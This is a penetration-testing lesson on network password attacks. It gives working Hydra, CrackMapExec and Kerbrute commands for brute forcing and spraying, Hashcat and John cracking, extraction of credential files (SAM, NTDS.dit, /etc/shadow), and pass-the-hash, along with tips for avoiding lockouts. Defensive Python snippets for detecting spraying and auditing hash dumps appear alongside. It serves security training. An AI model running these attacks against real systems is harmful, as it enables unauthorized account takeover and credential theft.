Network Password Attacks

intermediate | 30 min | Writeup

Cracking and spraying passwords across network services

Learning Objectives

  • Perform password spraying
  • Use Hydra for brute forcing
  • Crack captured hashes
  • Avoid account lockouts

Humans are terrible at creating passwords. We reuse them, make them predictable, and write them on sticky notes. This makes password attacks one of the most effective ways to gain access. From brute forcing to hash cracking, this lesson covers the techniques that exploit our password weaknesses.

The goal isn't just to break passwords - it's to do it efficiently. Trying every possible combination is technically possible but practically stupid. Smart attackers use wordlists, patterns, and password psychology.

Legal Warning

Password attacks against systems you don't own or have explicit authorization to test are illegal. This applies even if you're "just testing" or the password is weak.

Types of Password Attacks

  • Brute Force: Try every combination (slow, thorough)
  • Dictionary Attack: Use wordlist of common passwords
  • Hybrid Attack: Wordlist + rules (password → Password1!)
  • Password Spraying: One password, many users
  • Credential Stuffing: Use leaked credentials
  • Hash Cracking: Crack captured password hashes

Online Password Attacks

Online attacks hit live services. They're slower because you're waiting for network responses, but they work when you don't have hashes.

Hydra

The Swiss Army knife of network brute forcing.

```bash
# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
hydra -L users.txt -P passwords.txt ssh://192.168.1.10

# FTP
hydra -l admin -P passwords.txt ftp://192.168.1.10

# HTTP Basic Auth
hydra -l admin -P passwords.txt http-get://192.168.1.10/protected/

# HTTP POST form (^USER^/^PASS^ are substituted; the last field is the failure string)
hydra -l admin -P passwords.txt 192.168.1.10 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"

# SMB
hydra -l admin -P passwords.txt smb://192.168.1.10

# MySQL
hydra -l root -P passwords.txt mysql://192.168.1.10

# Rate limiting: 4 parallel tasks, 2 second wait between attempts
hydra -l admin -P passwords.txt -t 4 -W 2 ssh://192.168.1.10
```

CrackMapExec (CME)

Perfect for Windows/SMB environments. Can spray across entire subnets.

```bash
# SMB password spray across a subnet
crackmapexec smb 192.168.1.0/24 -u admin -p password123

# User list, single password (spraying)
crackmapexec smb 192.168.1.10 -u users.txt -p 'Summer2024!'

# Single user, password list
crackmapexec smb 192.168.1.10 -u admin -p passwords.txt

# WinRM
crackmapexec winrm 192.168.1.10 -u admin -p passwords.txt

# LDAP
crackmapexec ldap 192.168.1.10 -u admin -p passwords.txt
```

Account Lockout

Most systems lock accounts after 3-5 failed attempts. Password spraying (one password across many users) avoids this. Never brute force Active Directory without understanding the lockout policy.

Password Spraying Strategy

```bash
# Step 1: Enumerate valid usernames first
# From OSINT, LinkedIn, email patterns, SMB enumeration

# Step 2: Create targeted password list
# CompanyName + Year
# Season + Year
# Common patterns

cat << 'EOF' > spray_passwords.txt
Summer2024!
Winter2023!
CompanyName123
Welcome1
Password1
EOF

# Step 3: Spray one password at a time across all users, spacing the rounds
# out so no account crosses the lockout threshold
crackmapexec smb 192.168.1.10 -u users.txt -p spray_passwords.txt --continue-on-success

# Kerbrute for AD (doesn't cause lockouts with pre-auth disabled)
kerbrute passwordspray -d corp.local --dc 192.168.1.10 users.txt 'Password123!'
```
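Spraying as described above leaves a distinctive footprint on the target side, the mirror image of the lockout logic: many accounts, each failing only once or twice, all from one source. The following is an added example, not part of this page, that classifies sshd-style authentication failures by source; the log sample and the thresholds are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sshd-style log lines (not real data): one source walks one password
# across many accounts, another hammers a single account, a third succeeds.
SAMPLE_AUTH_LOG = """\
Jun 10 09:00:01 host sshd[111]: Failed password for alice from 203.0.113.7 port 4001 ssh2
Jun 10 09:00:03 host sshd[112]: Failed password for bob from 203.0.113.7 port 4002 ssh2
Jun 10 09:00:05 host sshd[113]: Failed password for carol from 203.0.113.7 port 4003 ssh2
Jun 10 09:00:07 host sshd[114]: Failed password for dave from 203.0.113.7 port 4004 ssh2
Jun 10 09:00:09 host sshd[115]: Failed password for invalid user erin from 203.0.113.7 port 4005 ssh2
Jun 10 09:01:00 host sshd[116]: Failed password for alice from 198.51.100.9 port 5001 ssh2
Jun 10 09:01:02 host sshd[117]: Failed password for alice from 198.51.100.9 port 5002 ssh2
Jun 10 09:01:04 host sshd[118]: Failed password for alice from 198.51.100.9 port 5003 ssh2
Jun 10 09:02:00 host sshd[119]: Accepted password for bob from 192.0.2.5 port 6001 ssh2
"""

FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)"
)

def classify_sources(log_text, min_users=4, lockout_threshold=5, repeat_threshold=3):
    """Group failed logins by source IP and label the pattern per source.

    'spray': >= min_users distinct accounts, none hit lockout_threshold times
             (the shape that slips under per-account lockout)
    'brute': one or few accounts hit repeat_threshold or more times
    'noise': anything else (a few scattered failures)
    """
    per_src = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            per_src[m.group("src")][m.group("user")] += 1

    report = {}
    for src, users in per_src.items():
        distinct, worst = len(users), max(users.values())
        if distinct >= min_users and worst < lockout_threshold:
            verdict = "spray"
        elif worst >= repeat_threshold:
            verdict = "brute"
        else:
            verdict = "noise"
        report[src] = {"verdict": verdict, "users": distinct, "max_per_user": worst}
    return report
```

Sources that only produce "Accepted" lines never enter the report, so alerting on `verdict == "spray"` catches the low-and-slow pattern that per-account lockout counters miss.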

Spray Smart

Research the target: What's their password policy? Any recent password resets? New hires? New hire orientation often means default passwords like "Welcome1" or "ChangeMe123".

Hash Cracking

When you have password hashes, crack them offline. No rate limiting, no lockouts - just raw computing power vs. hash strength.

Identifying Hashes

```bash
# Using hash-identifier (interactive prompt)
hash-identifier

# Using hashid
hashid 'e10adc3949ba59abbe56e057f20f883e'

# Common hash formats
# MD5: 32 hex chars
# SHA1: 40 hex chars
# SHA256: 64 hex chars
# SHA512: 128 hex chars
# NTLM: 32 hex chars
# LM: 32 hex chars (often aad3b... prefix)
# bcrypt: $2a$/$2b$/$2y$ prefix
# sha512crypt: $6$ prefix
```

Hashcat

GPU-accelerated hash cracking. Incredibly fast.

```bash
# Basic dictionary attack
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt      # MD5
hashcat -m 1000 hash.txt rockyou.txt                        # NTLM
hashcat -m 1800 hash.txt rockyou.txt                        # sha512crypt
hashcat -m 3200 hash.txt rockyou.txt                        # bcrypt

# With rules
hashcat -m 1000 hash.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Brute force (mask attack)
hashcat -m 0 hash.txt -a 3 ?a?a?a?a?a?a      # 6-char, all printable chars
hashcat -m 0 hash.txt -a 3 ?u?l?l?l?d?d?d    # Ulllnnn pattern

# Character sets
# ?l = lowercase, ?u = uppercase, ?d = digits
# ?s = symbols, ?a = all printable

# Show cracked
hashcat -m 1000 hash.txt --show

# Resume session
hashcat --restore
```

John the Ripper

CPU-based, great format support, excellent for Unix hashes.

```bash
# Auto-detect format
john hash.txt

# Specify format
john --format=raw-md5 hash.txt
john --format=nt hash.txt

# With wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

# With rules
john --wordlist=rockyou.txt --rules=best64 hash.txt

# Show cracked
john --show hash.txt

# Extract hashes from files
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john unshadowed.txt
```

Wordlists & Rules

Essential Wordlists

```bash
# RockYou (14 million passwords)
/usr/share/wordlists/rockyou.txt

# SecLists collection
/usr/share/seclists/Passwords/

# Common-Credentials
/usr/share/seclists/Passwords/Common-Credentials/

# Generate custom wordlist from a site (depth 2, minimum word length 5)
cewl https://company.com -w cewl_wordlist.txt -d 2 -m 5

# Create targeted wordlist
cupp -i    # Interactive mode for social engineering data
```

Rule Files

```bash
# Hashcat rules
/usr/share/hashcat/rules/best64.rule    # Fast, high yield
/usr/share/hashcat/rules/rockyou-30000.rule
/usr/share/hashcat/rules/d3ad0ne.rule

# John rules
/etc/john/john.conf    # (Jumbo rules section)

# Custom rule examples
# Add numbers: $1 $2 $3 = password1, password2, password3
# Toggle case: T0 = Password
# Append special: $! = password!
```
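To make the rule syntax above concrete, here is an added example (not from this page and not hashcat's own code) that interprets a small subset of the hashcat rule language and shows how one base word fans out into the candidates a hybrid attack would try. Only the functions listed in the docstring are supported; everything else raises.

```python
def apply_rule(word, rule):
    """Apply one whitespace-separated hashcat-style rule line to a word.

    Supported functions (a subset of the real rule language):
      :  no-op       l  lowercase    u  uppercase    c  capitalize
      t  toggle all  r  reverse      d  duplicate
      $X append X    ^X prepend X    TN toggle case at position N (0-9, A-Z = 10-35)
    """
    for fn in rule.split():
        op, arg = fn[0], fn[1:]
        if op == ":":
            pass
        elif op == "l":
            word = word.lower()
        elif op == "u":
            word = word.upper()
        elif op == "c":
            word = word[:1].upper() + word[1:].lower()
        elif op == "t":
            word = word.swapcase()
        elif op == "r":
            word = word[::-1]
        elif op == "d":
            word = word * 2
        elif op == "$":
            word += arg
        elif op == "^":
            word = arg + word
        elif op == "T":
            n = int(arg, 36)  # hashcat positions run 0-9 then A-Z
            if n < len(word):
                word = word[:n] + word[n].swapcase() + word[n + 1:]
        else:
            raise ValueError(f"unsupported rule function {fn!r}")
    return word

def expand_wordlist(words, rules):
    """Return the unique candidates derived from every word x every rule, in order."""
    seen, out = set(), []
    for w in words:
        for r in rules:
            cand = apply_rule(w, r)
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out
```

Feeding a policy checker the output of `expand_wordlist` shows why "uppercase plus digit plus symbol" requirements add little: `password` satisfies them after the single rule `c $1 $!`.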

Windows Hash Attacks

```bash
# NTLM format: username:RID:LM:NTLM:::
# Example: admin:500:aad3b435b51404ee:e10adc3949ba59abbe56e057f20f883e:::

# Extract from SAM (requires SYSTEM and SAM files)
secretsdump.py -sam SAM -system SYSTEM LOCAL

# Extract from NTDS.dit (domain controller)
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

# Crack NTLM
hashcat -m 1000 ntlm_hashes.txt rockyou.txt

# Pass-the-Hash (no cracking needed!)
crackmapexec smb 192.168.1.10 -u admin -H 'aad3b435b51404ee:e10adc3949ba59abbe56e057f20f883e'
psexec.py -hashes 'aad3b435b51404ee:e10adc3949ba59abbe56e057f20f883e' admin@192.168.1.10
```
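The dump layout above is worth auditing from the defender's side before anyone thinks about cracking: accounts still storing an LM hash, accounts whose NT hash is the empty-password hash, and groups of accounts sharing one NT hash (same password, so one cracked or passed hash opens all of them). Added example, not from this page or from Impacket; the dump is constructed and its hash values are made-up hex, except the two well-known "empty" constants.

```python
from collections import defaultdict

# Constructed secretsdump-style dump (username:RID:LM:NT:::). Hash values are
# made up, not real credentials; two accounts deliberately share one NT hash.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
legacy_app:1106:0123456789abcdef0123456789abcdef:22222222222222222222222222222222:::
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

def parse_dump(text):
    """Yield (user, rid, lm, nt) from lines in the username:RID:LM:NT::: layout."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 4 and len(parts[3]) == 32:
            yield parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()

def audit_dump(text):
    """Report the weaknesses a defender wants out of a dump before it is cracked.

    Returns {'lm_enabled': [users], 'empty_password': [users],
             'shared_nt': {nt_hash: [users sharing it]}}.
    """
    by_nt = defaultdict(list)
    lm_enabled, empty_pw = [], []
    for user, _rid, lm, nt in parse_dump(text):
        by_nt[nt].append(user)
        if lm != EMPTY_LM:
            lm_enabled.append(user)   # real LM hash stored: legacy, trivially crackable
        if nt == EMPTY_NT:
            empty_pw.append(user)
    shared = {h: users for h, users in by_nt.items() if len(users) > 1}
    return {"lm_enabled": lm_enabled, "empty_password": empty_pw, "shared_nt": shared}
```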

Pass-the-Hash

With NTLM hashes, you often don't need to crack them. Many Windows services accept the hash directly for authentication!

Linux Hash Attacks

```bash
# /etc/shadow format
# username:$id$salt$hash:lastchanged:min:max:warn:inactive:expire

# Hash types by ID
# $1$ = MD5 (old, weak)
# $5$ = SHA-256
# $6$ = SHA-512 (most common)
# $y$ or $7$ = yescrypt (newer)

# Combine passwd and shadow
unshadow /etc/passwd /etc/shadow > linux_hashes.txt

# Crack with John
john --wordlist=rockyou.txt linux_hashes.txt

# Crack with Hashcat
# SHA-512: -m 1800
hashcat -m 1800 linux_hashes.txt rockyou.txt
```
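The length and prefix rules from the Identifying Hashes section, and the shadow layout just above, are enough for a small audit script: classify a hash string, and walk a shadow file reporting which accounts still use the weak `$1$` scheme, which are locked, and which have no password at all. Added example, not from this page or from hashid; the shadow sample is constructed with placeholder hash strings in the right layout.

```python
import re

# Rules from the "Identifying Hashes" table. Fixed-length hex digests are ambiguous
# (MD5, NTLM and LM are all 32 hex chars), so identify_hash returns a candidate list.
HEX_LENGTHS = {32: ["MD5", "NTLM", "LM"], 40: ["SHA1"], 64: ["SHA256"], 128: ["SHA512"]}
CRYPT_PREFIXES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
                  "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}
WEAK = {"md5crypt"}  # $1$: listed above as old and weak

def identify_hash(h):
    """Return candidate algorithm names for one hash string ([] if unrecognised)."""
    for prefix, name in CRYPT_PREFIXES.items():
        if h.startswith(prefix):
            return [name]
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        return list(HEX_LENGTHS.get(len(h), []))
    return []

def audit_shadow(text):
    """Parse shadow lines (user:$id$salt$hash:...) and give a verdict per account.

    Verdicts: 'weak' (md5crypt), 'ok' (modern crypt scheme), 'locked' (! or *),
    'nopassword' (empty field), 'unknown'.
    """
    report = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, field = line.split(":")[:2]
        if field == "":
            verdict = "nopassword"
        elif field.startswith(("!", "*")):
            verdict = "locked"
        else:
            algos = identify_hash(field)
            verdict = "unknown" if not algos else ("weak" if algos[0] in WEAK else "ok")
        report[user] = verdict
    return report

# Constructed shadow sample: placeholder hash strings in the right layout, not real.
SAMPLE_SHADOW = """\
root:$6$saltsalt$FAKEHASHFAKEHASHFAKEHASHFAKEHASHFAKEHASHFAKEHASHFAKEHASHFAKEHASHFAKEHAS:19000:0:99999:7:::
oldsvc:$1$abcdefgh$FAKEHASHFAKEHASHFAKEHA:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
guest::19000:0:99999:7:::
"""
```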

Password Attack Methodology

Password Attack Process

  1. Enumerate Users: Gather valid usernames from all sources
  2. Check Policy: Understand lockout thresholds
  3. Spray First: Try common passwords across all users
  4. Targeted Brute: If spraying fails, target specific accounts
  5. Hash Hunting: Look for cached/stored hashes
  6. Crack Hashes: Offline cracking with rules and wordlists
  7. Credential Reuse: Try cracked creds on other systems

Knowledge Check

Quick Quiz (question 1 of 3)

What is password spraying?

Challenges

Spray and Pray

Challenge · intermediate

Given a list of users and knowing the password policy requires 8+ chars with a number, spray common passwords to find valid credentials.


Crack the Hashes

Challenge · intermediate

You've obtained NTLM hashes from a domain controller. Crack as many as possible and identify any password patterns.


Key Takeaways

  • Password spraying avoids lockouts by trying few passwords across many users
  • Online attacks are slow; offline hash cracking is billions per second
  • Hydra for network services, CrackMapExec for Windows environments
  • Hashcat (GPU) is fastest, John the Ripper has best format support
  • Pass-the-Hash lets you authenticate without cracking NTLM
  • Custom wordlists based on target (CeWL, CUPP) are more effective
  • Rules transform wordlists: password → Password1!